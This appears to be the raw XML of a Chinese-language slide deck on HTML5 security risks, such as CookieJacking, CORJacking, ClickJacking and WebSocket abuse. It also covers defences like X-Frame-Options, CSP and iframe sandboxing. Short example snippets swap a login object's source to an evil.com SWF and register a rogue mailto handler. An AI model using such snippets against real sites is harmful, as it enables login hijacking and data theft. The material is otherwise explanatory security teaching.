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48" r:id="rId2"/>
    <p:sldMasterId id="2147483668" r:id="rId3"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId21"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="260" r:id="rId4"/>
    <p:sldId id="281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79" r:id="rId14"/>
    <p:sldId id="277" r:id="rId15"/>
    <p:sldId id="278" r:id="rId16"/>
    <p:sldId id="267" r:id="rId17"/>
    <p:sldId id="268" r:id="rId18"/>
    <p:sldId id="270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68551" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="61" d="100"/>
          <a:sy n="61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05F7F-49CF-43AC-95AF-90AB6F330745}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2012/9/9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0160-7676-4EEF-872F-C60DE8306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0160-7676-4EEF-872F-C60DE83062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7F3106-82BD-1A40-A77B-D3E7719ADD67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AB9B35-D424-5547-A88C-95E436A8F7C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771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50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756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176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549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760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045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3147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1166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257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26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694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0144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739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0106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5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48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75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61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605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813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69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84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94053" y="4193303"/>
            <a:ext cx="6667766" cy="92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单击此处编辑母版封面标题样式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55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8DCD-D31D-FC41-8E3F-41542104BF8F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734C-3BBE-7C43-A355-4D0DE547912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11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2400" kern="1200">
          <a:solidFill>
            <a:srgbClr val="376092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ü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EAB0-723B-7344-AF53-F429300C5401}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2012/9/9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7101-E87B-7541-B47C-6B7AFF08E6D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67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.sina.com.cn/hfah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t.qq.com/yujiejia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8713" y="4194602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76092"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="微软雅黑"/>
              </a:rPr>
              <a:t>关注</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092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2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="微软雅黑"/>
              </a:rPr>
              <a:t>安全</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="376092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9303" y="5005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376092"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="微软雅黑"/>
              </a:rPr>
              <a:t>蒋宇捷</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="376092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err="1" smtClean="0"/>
              <a:t>CookieJacking</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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172438" y="2659743"/>
            <a:ext cx="4911613" cy="1538514"/>
            <a:chOff x="2456649" y="4587649"/>
            <a:chExt cx="4911613" cy="1538514"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2456649" y="4587649"/>
              <a:ext cx="2075543" cy="1538514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被攻击域</a:t>
              </a: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92719" y="4587649"/>
              <a:ext cx="2075543" cy="1538514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攻击者域</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" alt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437849" y="5146448"/>
              <a:ext cx="1117600" cy="5177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拖拽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32191" y="4834392"/>
              <a:ext cx="92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Cookie</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN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251" y="2244929"/>
            <a:ext cx="4076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17391" y="1912256"/>
            <a:ext cx="8229600" cy="323419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CookieJacking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防御之道</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>- X-Frame-Options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>- JavaScript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9001" y="3218542"/>
            <a:ext cx="6430780" cy="95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(top !== window) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>top.location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window.location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>;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8774" y="2278394"/>
            <a:ext cx="3429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err="1" smtClean="0"/>
              <a:t>CORJacking</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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72966" y="1774371"/>
            <a:ext cx="8446747" cy="2219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&lt;object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>classid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>clsid:xxxxxxx-xxxx-xxxx-xxxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” id=“Login” width=“100%” height=“100%”         codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab&gt;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 name=“movie” value=“Login.swf” /&gt;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 name=“quality” value=“high” /&gt;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  &lt;embed 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=“Login.swf” quality=“high” width=“50%” height=“50%”&gt;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&lt;/object&gt;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966" y="4498463"/>
            <a:ext cx="8462513" cy="95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document.getElementByName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(‘Login’).item(0).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=‘http://evil.com/login.swf’;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8040" y="2712789"/>
            <a:ext cx="40481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7391" y="1283584"/>
            <a:ext cx="8229600" cy="323419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CORJacking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err="1" smtClean="0"/>
              <a:t>WebSocket</a:t>
            </a:r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WebSocket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攻击方式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1800" dirty="0" smtClean="0"/>
              <a:t>成为后门</a:t>
            </a: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r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>端口扫描</a:t>
            </a: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r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>僵尸网络</a:t>
            </a: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r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>网络嗅探器</a:t>
            </a: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endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击工具：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>JS-Recon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Symbol" charset="2"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>防御之道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8898" y="2406111"/>
            <a:ext cx="67341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orbited-firew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292" y="2276713"/>
            <a:ext cx="4381470" cy="30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1248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p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en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>registerProtocolHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>：信息泄漏</a:t>
            </a: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r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>：窃取文件</a:t>
            </a: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r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>历史</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>：隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>XSS URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Symbol" charset="2"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Symbol" charset="2"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Web Notifications</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>：盗取数据</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" alt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72966" y="3135086"/>
            <a:ext cx="8229600" cy="1087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navigator.registerProtocolHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“mailto”, “http://www.f.com/?uri=%s", “Evil Mail");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925" y="1803677"/>
            <a:ext cx="57721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对安全的改进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回顾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安全风险出现的原因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对安全的改进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err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>沙箱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smtClean="0"/>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>内容安全策略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smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>过滤器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smtClean="0"/>
              <a:t>HTML5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>安全规范</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="WordPress-Secuirity-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60" y="2654070"/>
            <a:ext cx="2852562" cy="284434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3750" y="2228850"/>
            <a:ext cx="2695774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966" y="3135086"/>
            <a:ext cx="8229600" cy="1087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Content-Security-Policy: default-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 https://jiang.yujie.net; frame-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 'none';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安全带来的机会</a:t>
            </a:r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82" y="2837502"/>
            <a:ext cx="4186691" cy="135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lue_E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47" y="2692651"/>
            <a:ext cx="4792337" cy="2995211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381" y="1232869"/>
            <a:ext cx="4186691" cy="125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安全的未来</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22" descr="13430953984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92" y="4370104"/>
            <a:ext cx="3654807" cy="1984938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25" name="Picture 24" descr="Community Grou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14" y="997692"/>
            <a:ext cx="2834194" cy="2477977"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 25" descr="market_growth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900" y="1248730"/>
            <a:ext cx="2961646" cy="222123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81757" y="3393082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28142 w 1601390"/>
              <a:gd name="connsiteY1" fmla="*/ 28142 h 960834"/>
              <a:gd name="connsiteX2" fmla="*/ 96083 w 1601390"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 960834"/>
              <a:gd name="connsiteX3" fmla="*/ 1505307 w 1601390"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 960834"/>
              <a:gd name="connsiteX4" fmla="*/ 1573248 w 1601390"/>
              <a:gd name="connsiteY4" fmla="*/ 28142 h 960834"/>
              <a:gd name="connsiteX5" fmla="*/ 1601390 w 1601390"/>
              <a:gd name="connsiteY5" fmla="*/ 96083 h 960834"/>
              <a:gd name="connsiteX6" fmla="*/ 1601390 w 1601390"/>
              <a:gd name="connsiteY6" fmla="*/ 864751 h 960834"/>
              <a:gd name="connsiteX7" fmla="*/ 1573248 w 1601390"/>
              <a:gd name="connsiteY7" fmla="*/ 932692 h 960834"/>
              <a:gd name="connsiteX8" fmla="*/ 1505307 w 1601390"/>
              <a:gd name="connsiteY8" fmla="*/ 960834 h 960834"/>
              <a:gd name="connsiteX9" fmla="*/ 96083 w 1601390"/>
              <a:gd name="connsiteY9" fmla="*/ 960834 h 960834"/>
              <a:gd name="connsiteX10" fmla="*/ 28142 w 1601390"/>
              <a:gd name="connsiteY10" fmla="*/ 932692 h 960834"/>
              <a:gd name="connsiteX11" fmla="*/ 0 w 1601390"/>
              <a:gd name="connsiteY11" fmla="*/ 864751 h 960834"/>
              <a:gd name="connsiteX12" fmla="*/ 0 w 1601390"/>
              <a:gd name="connsiteY12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70600"/>
                  <a:pt x="10123" y="46161"/>
                  <a:pt x="28142" y="28142"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46161" y="10123"/>
                  <a:pt x="70600" y="0"/>
                  <a:pt x="96083" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1505307" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1530790" y="0"/>
                  <a:pt x="1555229" y="10123"/>
                  <a:pt x="1573248" y="28142"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1591267" y="46161"/>
                  <a:pt x="1601390" y="70600"/>
                  <a:pt x="1601390" y="96083"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1601390" y="864751"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1601390" y="890234"/>
                  <a:pt x="1591267" y="914673"/>
                  <a:pt x="1573248" y="932692"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1555229" y="950711"/>
                  <a:pt x="1530790" y="960834"/>
                  <a:pt x="1505307" y="960834"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="96083" y="960834"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="70600" y="960834"/>
                  <a:pt x="46161" y="950711"/>
                  <a:pt x="28142" y="932692"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10123" y="914673"/>
                  <a:pt x="0" y="890234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582" tIns="119582" rIns="119582" bIns="11958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HTML5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0" smtClean="0"/>
              <a:t>规范</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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3443287" y="3674927"/>
            <a:ext cx="339494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kern="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3923704" y="3393082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28142 w 1601390"/>
              <a:gd name="connsiteY1" fmla="*/ 28142 h 960834"/>
              <a:gd name="connsiteX2" fmla="*/ 96083 w 1601390"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 960834"/>
              <a:gd name="connsiteX3" fmla="*/ 1505307 w 1601390"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 960834"/>
              <a:gd name="connsiteX4" fmla="*/ 1573248 w 1601390"/>
              <a:gd name="connsiteY4" fmla="*/ 28142 h 960834"/>
              <a:gd name="connsiteX5" fmla="*/ 1601390 w 1601390"/>
              <a:gd name="connsiteY5" fmla="*/ 96083 h 960834"/>
              <a:gd name="connsiteX6" fmla="*/ 1601390 w 1601390"/>
              <a:gd name="connsiteY6" fmla="*/ 864751 h 960834"/>
              <a:gd name="connsiteX7" fmla="*/ 1573248 w 1601390"/>
              <a:gd name="connsiteY7" fmla="*/ 932692 h 960834"/>
              <a:gd name="connsiteX8" fmla="*/ 1505307 w 1601390"/>
              <a:gd name="connsiteY8" fmla="*/ 960834 h 960834"/>
              <a:gd name="connsiteX9" fmla="*/ 96083 w 1601390"/>
              <a:gd name="connsiteY9" fmla="*/ 960834 h 960834"/>
              <a:gd name="connsiteX10" fmla="*/ 28142 w 1601390"/>
              <a:gd name="connsiteY10" fmla="*/ 932692 h 960834"/>
              <a:gd name="connsiteX11" fmla="*/ 0 w 1601390"/>
              <a:gd name="connsiteY11" fmla="*/ 864751 h 960834"/>
              <a:gd name="connsiteX12" fmla="*/ 0 w 1601390"/>
              <a:gd name="connsiteY12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70600"/>
                  <a:pt x="10123" y="46161"/>
                  <a:pt x="28142" y="28142"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46161" y="10123"/>
                  <a:pt x="70600" y="0"/>
                  <a:pt x="96083" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1505307" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1530790" y="0"/>
                  <a:pt x="1555229" y="10123"/>
                  <a:pt x="1573248" y="28142"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1591267" y="46161"/>
                  <a:pt x="1601390" y="70600"/>
                  <a:pt x="1601390" y="96083"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1601390" y="864751"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1601390" y="890234"/>
                  <a:pt x="1591267" y="914673"/>
                  <a:pt x="1573248" y="932692"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1555229" y="950711"/>
                  <a:pt x="1530790" y="960834"/>
                  <a:pt x="1505307" y="960834"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="96083" y="960834"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="70600" y="960834"/>
                  <a:pt x="46161" y="950711"/>
                  <a:pt x="28142" y="932692"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10123" y="914673"/>
                  <a:pt x="0" y="890234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582" tIns="119582" rIns="119582" bIns="11958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浏览器实现</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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5685234" y="3674927"/>
            <a:ext cx="339494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kern="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Freeform 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6165651" y="3393082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28142 w 1601390"/>
              <a:gd name="connsiteY1" fmla="*/ 28142 h 960834"/>
              <a:gd name="connsiteX2" fmla="*/ 96083 w 1601390"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 960834"/>
              <a:gd name="connsiteX3" fmla="*/ 1505307 w 1601390"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 960834"/>
              <a:gd name="connsiteX4" fmla="*/ 1573248 w 1601390"/>
              <a:gd name="connsiteY4" fmla="*/ 28142 h 960834"/>
              <a:gd name="connsiteX5" fmla="*/ 1601390 w 1601390"/>
              <a:gd name="connsiteY5" fmla="*/ 96083 h 960834"/>
              <a:gd name="connsiteX6" fmla="*/ 1601390 w 1601390"/>
              <a:gd name="connsiteY6" fmla="*/ 864751 h 960834"/>
              <a:gd name="connsiteX7" fmla="*/ 1573248 w 1601390"/>
              <a:gd name="connsiteY7" fmla="*/ 932692 h 960834"/>
              <a:gd name="connsiteX8" fmla="*/ 1505307 w 1601390"/>
              <a:gd name="connsiteY8" fmla="*/ 960834 h 960834"/>
              <a:gd name="connsiteX9" fmla="*/ 96083 w 1601390"/>
              <a:gd name="connsiteY9" fmla="*/ 960834 h 960834"/>
              <a:gd name="connsiteX10" fmla="*/ 28142 w 1601390"/>
              <a:gd name="connsiteY10" fmla="*/ 932692 h 960834"/>
              <a:gd name="connsiteX11" fmla="*/ 0 w 1601390"/>
              <a:gd name="connsiteY11" fmla="*/ 864751 h 960834"/>
              <a:gd name="connsiteX12" fmla="*/ 0 w 1601390"/>
              <a:gd name="connsiteY12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70600"/>
                  <a:pt x="10123" y="46161"/>
                  <a:pt x="28142" y="28142"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46161" y="10123"/>
                  <a:pt x="70600" y="0"/>
                  <a:pt x="96083" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1505307" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1530790" y="0"/>
                  <a:pt x="1555229" y="10123"/>
                  <a:pt x="1573248" y="28142"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1591267" y="46161"/>
                  <a:pt x="1601390" y="70600"/>
                  <a:pt x="1601390" y="96083"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1601390" y="864751"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1601390" y="890234"/>
                  <a:pt x="1591267" y="914673"/>
                  <a:pt x="1573248" y="932692"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1555229" y="950711"/>
                  <a:pt x="1530790" y="960834"/>
                  <a:pt x="1505307" y="960834"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="96083" y="960834"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="70600" y="960834"/>
                  <a:pt x="46161" y="950711"/>
                  <a:pt x="28142" y="932692"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10123" y="914673"/>
                  <a:pt x="0" y="890234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582" tIns="119582" rIns="119582" bIns="11958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应用实现</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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4674" y="3614738"/>
            <a:ext cx="282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http://t.sina.com.cn/hfahe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http://t.qq.com/yujiejiang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4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HTML5</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Freeform 3"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="468313" y="1989138"/>
            <a:ext cx="8248650" cy="379095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183883"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="365B9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pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Picture 34" descr="89_110125091555_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1196975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3203575" y="21955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1991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1113769" y="281389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1996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8" name="TextBox 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1573959" y="4944222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9" name="Picture 42" descr="ajax_png_180x160_crop_upscale_q85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2130" y="3779838"/>
            <a:ext cx="12874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43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4146361" y="5435600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1" name="Picture 44" descr="html5.thumbnail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3429000"/>
            <a:ext cx="1728788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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6875463" y="5508625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9" name="Picture 48" descr="xhtml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568" y="3550023"/>
            <a:ext cx="1351416" cy="1209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5" name="Picture 40" descr="page_css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4257" y="1400924"/>
            <a:ext cx="151288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6" descr="page_javascript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6581" y="1400924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zh-CN" dirty="0" smtClean="0"/>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>风险综述</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="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710" y="2178209"/>
            <a:ext cx="3813410" cy="27075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050" y="1657994"/>
            <a:ext cx="681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632421" y="1096739"/>
            <a:ext cx="1087394" cy="538725"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 124779"/>
              <a:gd name="adj2" fmla="val 51580"/>
              <a:gd name="adj3" fmla="val 222256"/>
              <a:gd name="adj4" fmla="val 9131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新标签攻击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57200" y="3090120"/>
            <a:ext cx="1087394" cy="538725"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 54698"/>
              <a:gd name="adj2" fmla="val 105303"/>
              <a:gd name="adj3" fmla="val 128355"/>
              <a:gd name="adj4" fmla="val 2287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WebSQL</a:t>
            </a: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57200" y="5028184"/>
            <a:ext cx="1087394" cy="538725"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 54698"/>
              <a:gd name="adj2" fmla="val 105303"/>
              <a:gd name="adj3" fmla="val 28102"/>
              <a:gd name="adj4" fmla="val 1866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CORS</a:t>
            </a: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981950" y="3052119"/>
            <a:ext cx="1087394" cy="889686"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 47816"/>
              <a:gd name="adj2" fmla="val -11742"/>
              <a:gd name="adj3" fmla="val 89843"/>
              <a:gd name="adj4" fmla="val -1803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 Storage</a:t>
            </a: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981950" y="1908846"/>
            <a:ext cx="1087394" cy="747857"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 114097"/>
              <a:gd name="adj2" fmla="val 30429"/>
              <a:gd name="adj3" fmla="val 190604"/>
              <a:gd name="adj4" fmla="val -1147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 Worker</a:t>
            </a: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145783" y="5918331"/>
            <a:ext cx="1298409" cy="538725"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val -10584"/>
              <a:gd name="adj2" fmla="val 71667"/>
              <a:gd name="adj3" fmla="val -110296"/>
              <a:gd name="adj4" fmla="val 926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ClickJacking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977871" y="1119269"/>
            <a:ext cx="1298409" cy="538725"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 119981"/>
              <a:gd name="adj2" fmla="val 48914"/>
              <a:gd name="adj3" fmla="val 203059"/>
              <a:gd name="adj4" fmla="val 4060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CORJacking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695068" y="5918331"/>
            <a:ext cx="1676401" cy="538725"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val -13195"/>
              <a:gd name="adj2" fmla="val 48914"/>
              <a:gd name="adj3" fmla="val -107685"/>
              <a:gd name="adj4" fmla="val 330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CookieJacking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57200" y="3941805"/>
